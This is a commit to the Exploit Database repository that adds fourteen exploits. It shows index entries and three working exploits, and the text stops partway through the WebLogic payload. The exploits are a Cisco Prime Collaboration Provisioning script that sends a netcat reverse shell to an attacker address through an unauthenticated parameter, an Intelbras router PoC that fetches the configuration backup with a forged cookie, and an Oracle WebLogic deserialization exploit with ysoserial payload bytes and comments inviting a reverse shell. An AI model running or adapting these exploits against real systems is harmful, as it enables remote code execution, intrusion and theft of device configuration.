From a92226f6ac8d8c19fbc720ea88eb73ae2caacdd8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 29 Sep 2017 05:01:35 +0000 Subject: [PATCH] DB: 2017-09-29 14 new exploits DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC) Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit) Oracle WebLogic Server 10.3.6.0 - Java Deserialization Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection Roteador Wireless Intelbras WRN150 - Autentication Bypass Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection --- files.csv | 14 +++ platforms/hardware/remote/42888.sh | 28 +++++ platforms/hardware/webapps/42916.py | 31 +++++ platforms/java/remote/42806.py | 97 +++++++++++++++ platforms/linux/remote/41910.sh | 7 +- platforms/multiple/remote/42885.rb | 185 ++++++++++++++++++++++++++++ platforms/php/webapps/42380.txt | 46 +++++++ platforms/php/webapps/42889.txt | 113 +++++++++++++++++ platforms/php/webapps/42893.txt | 162 ++++++++++++++++++++++++ platforms/php/webapps/42894.txt | 89 +++++++++++++ platforms/php/webapps/42895.txt | 82 ++++++++++++ platforms/php/webapps/42919.txt | 37 ++++++ platforms/windows/dos/42917.py | 32 +++++ platforms/windows/local/42890.txt | 113 +++++++++++++++++ platforms/windows/local/42918.py | 68 ++++++++++ platforms/windows/webapps/42892.txt | 135 ++++++++++++++++++++ 16 files changed, 1236 insertions(+), 3 deletions(-) create mode 100755 platforms/hardware/remote/42888.sh create mode 100755 platforms/hardware/webapps/42916.py create mode 100755 platforms/java/remote/42806.py create mode 100755 platforms/multiple/remote/42885.rb create mode 100755 platforms/php/webapps/42380.txt create mode 100755 platforms/php/webapps/42889.txt create mode 100755 platforms/php/webapps/42893.txt create mode 100755 platforms/php/webapps/42894.txt create mode 100755 platforms/php/webapps/42895.txt create mode 100755 platforms/php/webapps/42919.txt create mode 100755 platforms/windows/dos/42917.py create mode 100755 platforms/windows/local/42890.txt create mode 100755 platforms/windows/local/42918.py create mode 100755 platforms/windows/webapps/42892.txt diff --git a/files.csv b/files.csv index 042b8ba04..fb33ea662 100644 --- a/files.csv +++ b/files.csv @@ -5688,6 +5688,7 @@ id,file,description,date,author,platform,type,port 42781,platforms/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos,0 42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0 42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0 +42917,platforms/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -9259,6 +9260,8 @@ id,file,description,date,author,platform,type,port 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0 42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0 42777,platforms/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,windows,local,0 +42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0 +42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15732,6 +15735,7 @@ id,file,description,date,author,platform,type,port 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 +42885,platforms/multiple/remote/42885.rb,"LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)",2017-09-27,"James Fitts",multiple,remote,0 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0 42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251 @@ -15861,6 +15865,8 @@ id,file,description,date,author,platform,type,port 42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0 42790,platforms/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote,0 42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858 +42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0 +42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -38359,6 +38365,7 @@ id,file,description,date,author,platform,type,port 42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0 42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0 +42380,platforms/php/webapps/42380.txt,"Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps,0 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0 42543,platforms/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,java,webapps,0 @@ -38586,3 +38593,10 @@ id,file,description,date,author,platform,type,port 42802,platforms/php/webapps/42802.txt,"WordPress Plugin Hospital Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0 42884,platforms/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,multiple,webapps,0 42805,platforms/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0 +42889,platforms/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,php,webapps,0 +42892,platforms/windows/webapps/42892.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption",2017-09-28,hyp3rlinx,windows,webapps,0 +42893,platforms/php/webapps/42893.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure",2017-09-28,hyp3rlinx,php,webapps,0 +42894,platforms/php/webapps/42894.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery",2017-09-28,hyp3rlinx,php,webapps,0 +42895,platforms/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,php,webapps,0 +42916,platforms/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",hardware,webapps,0 +42919,platforms/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0 diff --git a/platforms/hardware/remote/42888.sh b/platforms/hardware/remote/42888.sh new file mode 100755 index 000000000..87d365ef2 --- /dev/null +++ b/platforms/hardware/remote/42888.sh @@ -0,0 +1,28 @@ +# Exploit Title: Cisco Prime Collaboration Provisioning < 12.1 - ScriptMgr Servlet Authentication Bypass Remote Code Execution +# Date: 09/27/2017 +# Exploit Author: Adam Brown +# Vendor Homepage: https://cisco.com +# Software Link: https://software.cisco.com/download/release.html?mdfid=286308336&softwareid=286289070&release=11.6&flowid=81443 +# Version: < 12.1 +# Tested on: Debian 8 +# CVE : 2017-6622 +# Reference: https://www.tenable.com/plugins/index.php?view=single&id=101531 +# Mitigation - Upgrade your Cisco Prime Collaboration Provisioning server to 12.1 or later. + +# Description - This vulnerability allows an unauthenticated attacker to execute arbitrary Java code on a system running Cisco Prime Collaboration Provisioning server < 12.1 via a scripttext parameter in the ScriptMgr page. + +# Usage: ./prime-shell.sh + +function encode() { + echo "$1" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"' +} + +TARGET=$1 +ATTACKER=$2 +PORT=$3 + +BASH=$(encode "/bin/bash") +COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f") +SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});" + +curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT" diff --git a/platforms/hardware/webapps/42916.py b/platforms/hardware/webapps/42916.py new file mode 100755 index 000000000..f748791ee --- /dev/null +++ b/platforms/hardware/webapps/42916.py @@ -0,0 +1,31 @@ +# Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN +150 +# Date: 28/09/2017 +# Exploit Author: Elber Tavares +# Vendor Homepage: http://intelbras.com.br/ +# Version: Intelbras Wireless N 150 Mbps - WRN 150 +# Tested on: kali linux, windows 7, 8.1, 10 +For more info: + +http://whiteboyz.xyz/authentication-bypass-intelbras-wrn-150.html + +URL VULN: http://10.0.0.1/ + +Download backup file: + +Payload: curl --cookie "Cookie=admin:language=pt" +http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg + + + +PoC: + +#pip install requests +from requests import get + +url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg" +#url do backup +header = {'Cookie': 'admin:language=pt'} +#setando o cookie no header +r = get(url, headers=header).text +print(r) diff --git a/platforms/java/remote/42806.py b/platforms/java/remote/42806.py new file mode 100755 index 000000000..86dd4f6f2 --- /dev/null +++ b/platforms/java/remote/42806.py @@ -0,0 +1,97 @@ +# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution] +# Date: [27/09/2017] +# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot +# Vulnerability Author: FoxGloveSecurity +# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html] +# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0] +# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr] +# CVE : [CVE-2015-4852] + +''' +This exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send +Ping requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful. +Feel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as +this script will do it for you on the fly. + +Note: I tried to get a bash one liner reverse shell payload working but that did not work on my target for some reason. Please let me know if you get it working :) +''' + +#!/usr/bin/env python +import socket +import sys +import struct +from binascii import unhexlify + +print "\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit..." +print "[+]Here is the command:\n\t tcpdump -nni -e icmp[icmptype] == 8\n" + +if len(sys.argv) < 2: + print "\n[+]Please provide target IP and Port..." + print "[+]Usage:\n\t ./weblogic_linuxPing.py " + sys.exit() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +server_address = (sys.argv[1], int(sys.argv[2])) +print '[+]Connecting to %s port %s' % server_address +sock.connect(server_address) + +#Send headers +headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' +print '[+]Sending\n"%s"' % headers +sock.sendall(headers) + +data = sock.recv(1024) +print >>sys.stderr, '\n[+]Received "%s"' % data + + +#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload. +#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length +chunk1='\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + + +#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out +#len(payload) is xxxx bytes +#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target. +#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload. + +#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :) +chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" + + +chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x